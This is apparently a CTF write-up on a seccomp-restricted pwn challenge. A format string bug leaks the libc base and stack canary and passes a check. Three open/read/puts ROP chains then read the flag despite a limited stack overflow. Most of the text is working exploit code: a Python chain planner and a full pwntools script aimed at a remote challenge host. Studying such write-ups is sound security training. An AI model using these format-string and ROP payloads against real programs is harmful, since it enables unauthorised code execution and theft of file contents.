[Original] orw bypass when execve is disabled and the overflow length is limited
2022-10-30 17:09
Preface
Written in my spare time. Over the weekend I helped a classmate look at a challenge remotely, so I am writing it down here.
IDA
Loading the program into IDA shows a format string vulnerability in sub_401474().
Through the format string we get an arbitrary write (%n), which we use to set v1[0] to 0x1234 and pass the check, and an arbitrary read (%p), which leaks a libc address (the return address into __libc_start_main) and the stack canary.
Once that check is bypassed, main() contains a stack overflow.
However, execve is disabled, so returning to system("/bin/sh") is not an option,
and we use orw (open / read / write, with puts standing in for write) to read the flag out instead. The overflow length is limited, so the open, read and puts calls are split into three separate ROP chains: each chain ends by returning into main, the program runs from the start again, and the next chain is sent through the same vulnerability.
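The two ideas above (a single printf that both performs the %n write and leaks via %p, and splitting the orw chain across several returns into main) as an added example that is not the writeup's exploit and does not talk to the challenge binary: it builds the format string, derives the libc base and canary from a constructed printf reply, and greedily packs open/read/puts into chains that each fit a given overflow budget. The libc offsets in LIBC_OFF, the path and buffer addresses, and the reply bytes are illustrative assumptions; the 0x70-8 frame layout, the 0x401511 restart address, fd 3 and __free_hook as the scratch buffer follow the writeup.

```python
import re
import struct


def p64(v):
    """Little-endian 64-bit pack, the same thing pwntools' p64 does."""
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


# ---- step 1: one printf does both the write and the leaks ----

def fmt_payload(write_value, write_idx, leak_idxs):
    """'%<N>c' pads printf's output to N bytes and '%<i>$n' stores that byte count
    through the pointer found at positional argument i (the writeup writes 0x1234
    via arg 7, i.e. into v1[0]). Each '%<j>$p' then prints the qword at arg j."""
    pd = "%{}c%{}$n".format(write_value, write_idx)
    pd += "".join("|%{}$p".format(j) for j in leak_idxs)
    return pd.encode()


def parse_leaks(reply):
    """Pull every 0x-prefixed hex token printf echoed back, in order."""
    return [int(tok, 16) for tok in re.findall(rb"0x([0-9a-fA-F]+)", reply)]


def libc_base_from_main_ret(ret_addr, libc_start_main_off, ret_off=243):
    """On glibc 2.31 main() returns into __libc_start_main+243, so subtracting that
    and the symbol offset gives the load base. A base that is not page aligned
    means the wrong stack slot was leaked or the wrong libc build was assumed."""
    base = ret_addr - ret_off - libc_start_main_off
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page aligned" % base)
    return base


# ---- step 2: chunk the ROP chain so every piece fits the overflow budget ----

FRAME_PAD = 0x70 - 8     # bytes from the buffer start to the canary (from the writeup)
SAVED_RBP = 0xDEADBEEF   # arbitrary: main's rbp is never used after the ret
MAIN_RESTART = 0x401511  # address inside main the writeup returns to between chains


def split_rop(calls, restart, limit, frame_len=FRAME_PAD + 16):
    """Greedily pack ROP calls (each a list of qwords: gadgets, arguments, target)
    into chains of at most `limit` bytes. The count includes the padding, canary
    and saved rbp, plus one trailing `restart` qword that returns into main so the
    program can be driven through the vulnerability again for the next chain."""
    chains, cur = [], []
    for call in calls:
        if frame_len + 8 * (len(call) + 1) > limit:
            raise ValueError("%d-qword call can never fit in %d bytes" % (len(call), limit))
        if cur and frame_len + 8 * (len(cur) + len(call) + 1) > limit:
            chains.append(cur + [restart])
            cur = []
        cur.extend(call)
    if cur:
        chains.append(cur + [restart])
    return chains


def build_payloads(canary, chains):
    """Each chain becomes: padding | canary | saved rbp | ROP qwords."""
    frame = b"a" * FRAME_PAD + p64(canary) + p64(SAVED_RBP)
    return [frame + b"".join(p64(q) for q in chain) for chain in chains]


def orw_calls(g, path_addr, buf_addr, fd=3, n=0x30):
    """open(path, O_RDONLY); read(fd, buf, n); puts(buf). fd=3 assumes the flag is
    the first file the process opens; buf is writable libc memory (__free_hook)."""
    return [
        [g["pop_rdi"], path_addr, g["pop_rsi"], 0, g["open"]],
        [g["pop_rdi"], fd, g["pop_rsi"], buf_addr, g["pop_rdx"], n, g["read"]],
        [g["pop_rdi"], buf_addr, g["puts"]],
    ]


# Illustrative offsets only (not taken from any real libc build): resolve the real
# ones from the challenge's libc with ELF().symbols and a gadget finder.
LIBC_OFF = {
    "__libc_start_main": 0x26FC0, "pop_rdi": 0x26B72, "pop_rsi": 0x27529,
    "pop_rdx": 0x11C371, "open": 0x110E50, "read": 0x111130, "puts": 0x875A0,
    "__free_hook": 0x1EEB28,
}


def plan(reply, limit, path_addr):
    """From the printf reply derive libc base and canary, then the chunked payloads."""
    ret_addr, canary = parse_leaks(reply)
    base = libc_base_from_main_ret(ret_addr, LIBC_OFF["__libc_start_main"])
    g = {k: base + v for k, v in LIBC_OFF.items()}
    chains = split_rop(orw_calls(g, path_addr, g["__free_hook"]), MAIN_RESTART, limit)
    return base, canary, build_payloads(canary, chains)


# Constructed printf reply: 0x1234 bytes of %c padding, then the two leaked qwords
# (main's return address = base 0x7f3a1c000000 + __libc_start_main + 243, and a canary).
SAMPLE_REPLY = b" " * 0x1234 + b"|0x7f3a1c0270b3|0x5a2b3c4d5e6f7700"

if __name__ == "__main__":
    print(fmt_payload(0x1234, 7, [33, 13]))
    base, canary, payloads = plan(SAMPLE_REPLY, limit=0xC0, path_addr=0x404080)
    print("libc base 0x%x, canary 0x%x" % (base, canary))
    for i, pd in enumerate(payloads):
        print("chain %d: %d bytes" % (i + 1, len(pd)))
```

With a 0xc0-byte budget the packer produces the same three chains as the writeup (open, then read, then puts); raise the limit to 0x100 and everything collapses into a single chain, while a budget below what the 7-qword read call needs is reported as an error instead of producing a truncated chain. The page-alignment check on the derived libc base is the cheapest way to notice that the wrong stack slot or the wrong libc build was assumed before spending a connection on a broken ROP chain.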
exp
```python
#coding:utf8
from pwn import *

context(arch="amd64", os="linux", log_level="debug")
# p = process("./easystack")        # local testing
p = remote("47.92.207.120", 29254)
elf = ELF("./easystack")
libc = ELF("libc-2.31.so")

# Format string: %4660c%7$n writes 0x1234 through the pointer at arg 7 (v1[0]),
# %33$p leaks main's return address (__libc_start_main+243), %13$p leaks the canary.
p.recvuntil(b"Please input: ")
pd = b"%" + str(0x1234).encode() + b"c%7$n" + b"########" + b"%33$p" + b"@@" + b"%13$p"
p.sendline(pd)
p.recvuntil(b"########0x")
libc_addr = int(p.recv(12), 16) - 243 - libc.symbols['__libc_start_main']
p.recvuntil(b"@@0x")
canary = int(p.recv(16), 16)

system_addr = libc_addr + libc.symbols['system']     # unused: execve is disabled
binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
pop_rdi_ret = libc_addr + next(libc.search(asm("pop rdi\nret")))
pop_rsi_ret = libc_addr + next(libc.search(asm("pop rsi\nret")))
pop_rdx_ret = libc_addr + 0x142c92                   # offset specific to the provided libc-2.31.so
open_addr = libc_addr + libc.symbols['open']
free_hook = libc_addr + libc.symbols['__free_hook']  # writable libc memory used as the flag buffer
read_addr = libc_addr + libc.symbols['read']
puts_addr = libc_addr + libc.symbols['puts']

print("canary : " + hex(canary))
print("pop_rdi_ret : " + hex(pop_rdi_ret))
print("system_addr : " + hex(system_addr))
print("binsh_addr : " + hex(binsh_addr))
print("libc_addr : " + hex(libc_addr))

# Chain 1: open(flag, O_RDONLY). rdi is not set by the chain; it relies on the
# pointer the "3flag" menu input leaves behind. 0x401511 returns into main.
p.recvuntil(b">> ")
p.sendline(b"1")
pd = b"a" * (0x70 - 0x8) + p64(canary) + p64(0xdeadbeef)
pd += p64(pop_rsi_ret) + p64(0) + p64(open_addr) + p64(0x401511)
print(hex(len(pd)))
p.sendline(pd)
p.recvuntil(b">> ")
p.sendline(b"3flag\x00")

# Chain 2: read(3, free_hook, 0x30). The format-string write has to be redone
# each time main restarts so the v1[0] == 0x1234 check passes again.
p.recvuntil(b"Please input: ")
pd = b"%" + str(0x1234).encode() + b"c%7$n"
p.sendline(pd)
p.recvuntil(b">> ")
p.sendline(b"1")
pd = b"a" * (0x70 - 0x8) + p64(canary) + p64(0xdeadbeef)
pd += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(free_hook) + p64(pop_rdx_ret) + p64(0x30)
pd += p64(read_addr) + p64(0x401511)
p.sendline(pd)
print(hex(len(pd)))
p.recvuntil(b">> ")
p.sendline(b"3")

# Chain 3: puts(free_hook) prints the flag; no restart needed afterwards.
p.recvuntil(b"Please input: ")
pd = b"%" + str(0x1234).encode() + b"c%7$n"
p.sendline(pd)
p.recvuntil(b">> ")
p.sendline(b"1")
pd = b"a" * (0x70 - 0x8) + p64(canary) + p64(0xdeadbeef)
pd += p64(pop_rdi_ret) + p64(free_hook) + p64(puts_addr)
p.sendline(pd)
print(hex(len(pd)))
p.recvuntil(b">> ")
p.sendline(b"3")
p.interactive()
```
The flag is obtained successfully.